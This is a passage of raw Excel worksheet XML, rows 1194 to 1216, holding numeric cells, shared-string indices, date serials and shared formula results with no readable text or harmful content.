      <c r="A1194" s="1">
        <v>16469.0</v>
      </c>
      <c r="B1194" s="2" t="s">
        <v>5151</v>
      </c>
      <c r="C1194" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1194" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1194" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1194" s="1" t="s">
        <v>4706</v>
      </c>
      <c r="G1194" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1194" s="1" t="s">
        <v>5152</v>
      </c>
      <c r="I1194" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1194" s="1" t="s">
        <v>5140</v>
      </c>
      <c r="K1194" s="2" t="s">
        <v>5141</v>
      </c>
      <c r="L1194" s="1">
        <v>5.0</v>
      </c>
      <c r="M1194" s="1">
        <v>7.0</v>
      </c>
      <c r="N1194" s="1" t="s">
        <v>5153</v>
      </c>
      <c r="O1194" s="1" t="s">
        <v>5142</v>
      </c>
      <c r="P1194" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1194" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1194" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1194" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1195">
      <c r="A1195" s="1">
        <v>16470.0</v>
      </c>
      <c r="B1195" s="2" t="s">
        <v>5154</v>
      </c>
      <c r="C1195" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1195" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1195" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1195" s="1" t="s">
        <v>258</v>
      </c>
      <c r="G1195" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1195" s="1" t="s">
        <v>5155</v>
      </c>
      <c r="I1195" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1195" s="1" t="s">
        <v>5140</v>
      </c>
      <c r="K1195" s="2" t="s">
        <v>5141</v>
      </c>
      <c r="L1195" s="1">
        <v>5.0</v>
      </c>
      <c r="M1195" s="1">
        <v>7.0</v>
      </c>
      <c r="N1195" s="1" t="s">
        <v>4599</v>
      </c>
      <c r="O1195" s="1" t="s">
        <v>5142</v>
      </c>
      <c r="P1195" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1195" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1195" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1195" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1196">
      <c r="A1196" s="1">
        <v>16471.0</v>
      </c>
      <c r="B1196" s="2" t="s">
        <v>5156</v>
      </c>
      <c r="C1196" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1196" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1196" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1196" s="1" t="s">
        <v>258</v>
      </c>
      <c r="G1196" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1196" s="1" t="s">
        <v>5157</v>
      </c>
      <c r="I1196" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1196" s="1" t="s">
        <v>5140</v>
      </c>
      <c r="K1196" s="2" t="s">
        <v>5141</v>
      </c>
      <c r="L1196" s="1">
        <v>5.0</v>
      </c>
      <c r="M1196" s="1">
        <v>7.0</v>
      </c>
      <c r="N1196" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O1196" s="1" t="s">
        <v>5142</v>
      </c>
      <c r="P1196" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1196" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1196" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1196" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1197">
      <c r="A1197" s="1">
        <v>16492.0</v>
      </c>
      <c r="B1197" s="2" t="s">
        <v>5158</v>
      </c>
      <c r="C1197" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1197" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1197" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1197" s="1" t="s">
        <v>5159</v>
      </c>
      <c r="G1197" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1197" s="4">
        <v>44509.08541666667</v>
      </c>
      <c r="I1197" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J1197" s="1" t="s">
        <v>5160</v>
      </c>
      <c r="K1197" s="2" t="s">
        <v>5161</v>
      </c>
      <c r="L1197" s="1">
        <v>11.0</v>
      </c>
      <c r="M1197" s="1">
        <v>19.0</v>
      </c>
      <c r="N1197" s="1" t="s">
        <v>1838</v>
      </c>
      <c r="O1197" s="1" t="s">
        <v>5162</v>
      </c>
      <c r="P1197" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1197" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1197" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1197" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1198">
      <c r="A1198" s="1">
        <v>16501.0</v>
      </c>
      <c r="B1198" s="2" t="s">
        <v>5163</v>
      </c>
      <c r="C1198" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1198" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1198" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1198" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G1198" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1198" s="1" t="s">
        <v>5164</v>
      </c>
      <c r="I1198" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J1198" s="1" t="s">
        <v>5160</v>
      </c>
      <c r="K1198" s="2" t="s">
        <v>5161</v>
      </c>
      <c r="L1198" s="1">
        <v>11.0</v>
      </c>
      <c r="M1198" s="1">
        <v>19.0</v>
      </c>
      <c r="N1198" s="1" t="s">
        <v>5165</v>
      </c>
      <c r="O1198" s="1" t="s">
        <v>5162</v>
      </c>
      <c r="P1198" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1198" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1198" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1198" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1199">
      <c r="A1199" s="1">
        <v>16504.0</v>
      </c>
      <c r="B1199" s="2" t="s">
        <v>5166</v>
      </c>
      <c r="C1199" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1199" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1199" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1199" s="1" t="s">
        <v>2144</v>
      </c>
      <c r="G1199" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1199" s="1" t="s">
        <v>5167</v>
      </c>
      <c r="I1199" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1199" s="1" t="s">
        <v>5168</v>
      </c>
      <c r="K1199" s="2" t="s">
        <v>5169</v>
      </c>
      <c r="L1199" s="1">
        <v>3.0</v>
      </c>
      <c r="M1199" s="1">
        <v>3.0</v>
      </c>
      <c r="N1199" s="1" t="s">
        <v>5170</v>
      </c>
      <c r="O1199" s="1" t="s">
        <v>5171</v>
      </c>
      <c r="P1199" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1199" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1199" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1199" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1200">
      <c r="A1200" s="1">
        <v>16505.0</v>
      </c>
      <c r="B1200" s="2" t="s">
        <v>5172</v>
      </c>
      <c r="C1200" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1200" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1200" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1200" s="1" t="s">
        <v>5173</v>
      </c>
      <c r="G1200" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1200" s="1" t="s">
        <v>5174</v>
      </c>
      <c r="I1200" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1200" s="1" t="s">
        <v>5168</v>
      </c>
      <c r="K1200" s="2" t="s">
        <v>5169</v>
      </c>
      <c r="L1200" s="1">
        <v>3.0</v>
      </c>
      <c r="M1200" s="1">
        <v>3.0</v>
      </c>
      <c r="N1200" s="1" t="s">
        <v>5175</v>
      </c>
      <c r="O1200" s="1" t="s">
        <v>5171</v>
      </c>
      <c r="P1200" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1200" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1200" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1200" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1201">
      <c r="A1201" s="1">
        <v>16506.0</v>
      </c>
      <c r="B1201" s="2" t="s">
        <v>5176</v>
      </c>
      <c r="C1201" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1201" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1201" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1201" s="1" t="s">
        <v>4465</v>
      </c>
      <c r="G1201" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1201" s="4">
        <v>44197.618055555555</v>
      </c>
      <c r="I1201" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1201" s="1" t="s">
        <v>5177</v>
      </c>
      <c r="K1201" s="2" t="s">
        <v>5178</v>
      </c>
      <c r="L1201" s="1">
        <v>7.0</v>
      </c>
      <c r="M1201" s="1">
        <v>8.0</v>
      </c>
      <c r="N1201" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1201" s="1" t="s">
        <v>5179</v>
      </c>
      <c r="P1201" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1201" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1201" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1201" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1202">
      <c r="A1202" s="1">
        <v>16530.0</v>
      </c>
      <c r="B1202" s="2" t="s">
        <v>5180</v>
      </c>
      <c r="C1202" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1202" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1202" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1202" s="1" t="s">
        <v>5181</v>
      </c>
      <c r="G1202" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1202" s="4">
        <v>44690.86041666667</v>
      </c>
      <c r="I1202" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J1202" s="1" t="s">
        <v>5182</v>
      </c>
      <c r="K1202" s="2" t="s">
        <v>5183</v>
      </c>
      <c r="L1202" s="1">
        <v>4.0</v>
      </c>
      <c r="M1202" s="1">
        <v>4.0</v>
      </c>
      <c r="N1202" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1202" s="1" t="s">
        <v>5184</v>
      </c>
      <c r="P1202" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1202" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1202" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1202" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1203">
      <c r="A1203" s="1">
        <v>16533.0</v>
      </c>
      <c r="B1203" s="2" t="s">
        <v>5185</v>
      </c>
      <c r="C1203" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1203" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1203" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1203" s="1" t="s">
        <v>3036</v>
      </c>
      <c r="G1203" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1203" s="4">
        <v>44751.527083333334</v>
      </c>
      <c r="I1203" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J1203" s="1" t="s">
        <v>5182</v>
      </c>
      <c r="K1203" s="2" t="s">
        <v>5183</v>
      </c>
      <c r="L1203" s="1">
        <v>4.0</v>
      </c>
      <c r="M1203" s="1">
        <v>4.0</v>
      </c>
      <c r="N1203" s="1" t="s">
        <v>5186</v>
      </c>
      <c r="O1203" s="1" t="s">
        <v>5184</v>
      </c>
      <c r="P1203" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1203" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1203" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1203" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1204">
      <c r="A1204" s="1">
        <v>16535.0</v>
      </c>
      <c r="B1204" s="2" t="s">
        <v>5187</v>
      </c>
      <c r="C1204" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1204" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1204" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1204" s="1" t="s">
        <v>5188</v>
      </c>
      <c r="G1204" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1204" s="4">
        <v>44388.669444444444</v>
      </c>
      <c r="I1204" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1204" s="1" t="s">
        <v>5189</v>
      </c>
      <c r="K1204" s="2" t="s">
        <v>5190</v>
      </c>
      <c r="L1204" s="1">
        <v>4.0</v>
      </c>
      <c r="M1204" s="1">
        <v>4.0</v>
      </c>
      <c r="N1204" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1204" s="1" t="s">
        <v>5191</v>
      </c>
      <c r="P1204" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1204" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1204" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1204" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1205">
      <c r="A1205" s="1">
        <v>16544.0</v>
      </c>
      <c r="B1205" s="2" t="s">
        <v>5192</v>
      </c>
      <c r="C1205" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1205" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1205" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1205" s="1" t="s">
        <v>3036</v>
      </c>
      <c r="G1205" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1205" s="4">
        <v>44751.50277777778</v>
      </c>
      <c r="I1205" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1205" s="1" t="s">
        <v>5193</v>
      </c>
      <c r="K1205" s="2" t="s">
        <v>5194</v>
      </c>
      <c r="L1205" s="1">
        <v>5.0</v>
      </c>
      <c r="M1205" s="1">
        <v>9.0</v>
      </c>
      <c r="N1205" s="1" t="s">
        <v>317</v>
      </c>
      <c r="O1205" s="1" t="s">
        <v>5195</v>
      </c>
      <c r="P1205" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1205" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1205" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1205" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1206">
      <c r="A1206" s="1">
        <v>16551.0</v>
      </c>
      <c r="B1206" s="2" t="s">
        <v>5196</v>
      </c>
      <c r="C1206" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1206" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1206" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1206" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G1206" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1206" s="1" t="s">
        <v>5197</v>
      </c>
      <c r="I1206" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1206" s="1" t="s">
        <v>5198</v>
      </c>
      <c r="K1206" s="2" t="s">
        <v>5199</v>
      </c>
      <c r="L1206" s="1">
        <v>3.0</v>
      </c>
      <c r="M1206" s="1">
        <v>4.0</v>
      </c>
      <c r="N1206" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O1206" s="1" t="s">
        <v>5200</v>
      </c>
      <c r="P1206" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1206" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1206" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1206" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1207">
      <c r="A1207" s="1">
        <v>16558.0</v>
      </c>
      <c r="B1207" s="2" t="s">
        <v>5201</v>
      </c>
      <c r="C1207" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1207" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1207" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1207" s="1" t="s">
        <v>5202</v>
      </c>
      <c r="G1207" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1207" s="4">
        <v>44570.540972222225</v>
      </c>
      <c r="I1207" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1207" s="1" t="s">
        <v>5203</v>
      </c>
      <c r="K1207" s="2" t="s">
        <v>5204</v>
      </c>
      <c r="L1207" s="1">
        <v>6.0</v>
      </c>
      <c r="M1207" s="1">
        <v>12.0</v>
      </c>
      <c r="N1207" s="1" t="s">
        <v>429</v>
      </c>
      <c r="O1207" s="1" t="s">
        <v>5205</v>
      </c>
      <c r="P1207" s="1" t="s">
        <v>2192</v>
      </c>
      <c r="Q1207" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1207" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S1207" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="1208">
      <c r="A1208" s="1">
        <v>16561.0</v>
      </c>
      <c r="B1208" s="2" t="s">
        <v>5206</v>
      </c>
      <c r="C1208" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1208" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1208" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1208" s="1" t="s">
        <v>5202</v>
      </c>
      <c r="G1208" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1208" s="4">
        <v>44629.55694444444</v>
      </c>
      <c r="I1208" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1208" s="1" t="s">
        <v>5203</v>
      </c>
      <c r="K1208" s="2" t="s">
        <v>5204</v>
      </c>
      <c r="L1208" s="1">
        <v>6.0</v>
      </c>
      <c r="M1208" s="1">
        <v>12.0</v>
      </c>
      <c r="N1208" s="1" t="s">
        <v>5207</v>
      </c>
      <c r="O1208" s="1" t="s">
        <v>5205</v>
      </c>
      <c r="P1208" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1208" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1208" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1208" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="1209">
      <c r="A1209" s="1">
        <v>16562.0</v>
      </c>
      <c r="B1209" s="2" t="s">
        <v>5208</v>
      </c>
      <c r="C1209" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1209" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1209" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1209" s="1" t="s">
        <v>5209</v>
      </c>
      <c r="G1209" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1209" s="4">
        <v>44629.881944444445</v>
      </c>
      <c r="I1209" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1209" s="1" t="s">
        <v>5203</v>
      </c>
      <c r="K1209" s="2" t="s">
        <v>5204</v>
      </c>
      <c r="L1209" s="1">
        <v>6.0</v>
      </c>
      <c r="M1209" s="1">
        <v>12.0</v>
      </c>
      <c r="N1209" s="1" t="s">
        <v>2230</v>
      </c>
      <c r="O1209" s="1" t="s">
        <v>5205</v>
      </c>
      <c r="P1209" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1209" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1209" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1209" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="1210">
      <c r="A1210" s="1">
        <v>16596.0</v>
      </c>
      <c r="B1210" s="2" t="s">
        <v>5210</v>
      </c>
      <c r="C1210" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1210" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1210" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1210" s="1" t="s">
        <v>4939</v>
      </c>
      <c r="G1210" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1210" s="1" t="s">
        <v>5211</v>
      </c>
      <c r="I1210" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1210" s="1" t="s">
        <v>5212</v>
      </c>
      <c r="K1210" s="2" t="s">
        <v>5213</v>
      </c>
      <c r="L1210" s="1">
        <v>1.0</v>
      </c>
      <c r="M1210" s="1">
        <v>1.0</v>
      </c>
      <c r="N1210" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1210" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1210" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1210" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1210" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1210" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1211">
      <c r="A1211" s="1">
        <v>16604.0</v>
      </c>
      <c r="B1211" s="2" t="s">
        <v>5214</v>
      </c>
      <c r="C1211" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1211" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1211" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1211" s="1" t="s">
        <v>5215</v>
      </c>
      <c r="G1211" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1211" s="1" t="s">
        <v>5216</v>
      </c>
      <c r="I1211" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1211" s="1" t="s">
        <v>5217</v>
      </c>
      <c r="K1211" s="2" t="s">
        <v>5218</v>
      </c>
      <c r="L1211" s="1">
        <v>4.0</v>
      </c>
      <c r="M1211" s="1">
        <v>11.0</v>
      </c>
      <c r="N1211" s="1" t="s">
        <v>5010</v>
      </c>
      <c r="O1211" s="1" t="s">
        <v>5219</v>
      </c>
      <c r="P1211" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1211" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1211" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1211" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1212">
      <c r="A1212" s="1">
        <v>16608.0</v>
      </c>
      <c r="B1212" s="2" t="s">
        <v>5220</v>
      </c>
      <c r="C1212" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1212" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1212" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1212" s="1" t="s">
        <v>791</v>
      </c>
      <c r="G1212" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1212" s="4">
        <v>44596.44861111111</v>
      </c>
      <c r="I1212" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J1212" s="1" t="s">
        <v>5221</v>
      </c>
      <c r="K1212" s="2" t="s">
        <v>5222</v>
      </c>
      <c r="L1212" s="1">
        <v>1.0</v>
      </c>
      <c r="M1212" s="1">
        <v>1.0</v>
      </c>
      <c r="N1212" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1212" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1212" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1212" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1212" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1212" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1213">
      <c r="A1213" s="1">
        <v>16609.0</v>
      </c>
      <c r="B1213" s="2" t="s">
        <v>5223</v>
      </c>
      <c r="C1213" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1213" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1213" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1213" s="1" t="s">
        <v>5224</v>
      </c>
      <c r="G1213" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1213" s="1" t="s">
        <v>5225</v>
      </c>
      <c r="I1213" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1213" s="1" t="s">
        <v>5226</v>
      </c>
      <c r="K1213" s="2" t="s">
        <v>5227</v>
      </c>
      <c r="L1213" s="1">
        <v>3.0</v>
      </c>
      <c r="M1213" s="1">
        <v>7.0</v>
      </c>
      <c r="N1213" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1213" s="1" t="s">
        <v>5228</v>
      </c>
      <c r="P1213" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1213" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1213" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1213" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1214">
      <c r="A1214" s="1">
        <v>16615.0</v>
      </c>
      <c r="B1214" s="2" t="s">
        <v>5229</v>
      </c>
      <c r="C1214" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1214" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1214" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1214" s="1" t="s">
        <v>2162</v>
      </c>
      <c r="G1214" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1214" s="1" t="s">
        <v>5230</v>
      </c>
      <c r="I1214" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1214" s="1" t="s">
        <v>5226</v>
      </c>
      <c r="K1214" s="2" t="s">
        <v>5227</v>
      </c>
      <c r="L1214" s="1">
        <v>3.0</v>
      </c>
      <c r="M1214" s="1">
        <v>7.0</v>
      </c>
      <c r="N1214" s="1" t="s">
        <v>2572</v>
      </c>
      <c r="O1214" s="1" t="s">
        <v>5228</v>
      </c>
      <c r="P1214" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1214" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1214" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1214" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1215">
      <c r="A1215" s="1">
        <v>16617.0</v>
      </c>
      <c r="B1215" s="2" t="s">
        <v>5231</v>
      </c>
      <c r="C1215" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1215" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1215" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1215" s="1" t="s">
        <v>879</v>
      </c>
      <c r="G1215" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1215" s="4">
        <v>44295.93402777778</v>
      </c>
      <c r="I1215" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1215" s="1" t="s">
        <v>5232</v>
      </c>
      <c r="K1215" s="2" t="s">
        <v>5233</v>
      </c>
      <c r="L1215" s="1">
        <v>3.0</v>
      </c>
      <c r="M1215" s="1">
        <v>3.0</v>
      </c>
      <c r="N1215" s="1" t="s">
        <v>1761</v>
      </c>
      <c r="O1215" s="1" t="s">
        <v>5234</v>
      </c>
      <c r="P1215" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1215" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1215" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1215" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1216">
      <c r="A1216" s="1">
        <v>16619.0</v>
      </c>
      <c r="B1216" s="2" t="s">
        <v>5235</v>
      </c>
      <c r="C1216" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1216" s="2" t="s">
        <v>5236</v>
      </c>
      <c r="E1216" s="2" t="s">
        <v>693</v>
      </c>
      <c r="F1216" s="1" t="s">
        <v>5237</v>
      </c>
      <c r="G1216" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1216" s="1" t="s">
        <v>5238</v>
      </c>
      <c r="I1216" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1216" s="1" t="s">
        <v>5239</v>
      </c>
      <c r="K1216" s="2" t="s">
        <v>5240</v>
      </c>
      <c r="L1216" s="1">
        <v>2.0</v>
      </c>
      <c r="M1216" s="1">
        <v>2.0</v>
      </c>
      <c r="N1216" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1216" s="1" t="s">
        <v>2423</v>
      </c>
      <c r="P1216" s="1" t="s">
